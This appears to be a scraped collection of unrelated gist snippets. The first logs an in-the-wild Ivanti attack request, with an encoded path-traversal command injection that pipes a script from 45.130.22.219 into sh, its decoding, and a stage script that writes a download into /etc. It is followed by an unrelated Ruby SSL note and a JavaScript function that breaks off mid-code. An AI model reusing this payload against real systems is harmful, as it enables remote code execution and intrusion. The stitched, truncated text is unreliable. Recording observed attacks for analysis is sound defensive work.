kimber99

first stage: /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a
decodes to: /api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js|sh;

index of hosting on 45.130.22.219 says "Hacked by voadu"
scanned on URLScan.io Submission: On January 22 via manual (January 22nd 2024, 3:26:21 am UTC) from JP  — Scanned from NL 
ivanti.js:
#!/bin/bash
url='https://45.130.22.219/ivanti'
name1=`date +%s%N`
wget --no-check-certificate ${url} -O /etc/$name1

fnichol

Why?

There is a long standing issue in Ruby where the net/http library by default does not check the validity of an SSL certificate during a TLS handshake. Rather than deal with the underlying problem (a missing certificate authority, a self-signed certificate, etc.) one tends to see bad hacks everywhere. This can lead to problems down the road.

From what I can see the OpenSSL library that Rails Installer delivers has no certificate authorities defined. So, let's go fetch some from the curl website. And since this is for ruby, why don't we download and install the file with a ruby script?

Installation

The Ruby Way! (Fun)

blaine

var setTextMeasure = function (contentElement, targetMeasure, maxSize, minSize) {

  if (!contentElement) contentElement = document.createElement('p');
  if (!targetMeasure) targetMeasure = 66;
  if (!maxSize) maxSize = 16;
  if (!minSize) minSize = 9;

  var sizer = contentElement.cloneNode();

  sizer.style.cssText = 'margin: 0; padding: 0; color: transparent; background-color: transparent; position: absolute;';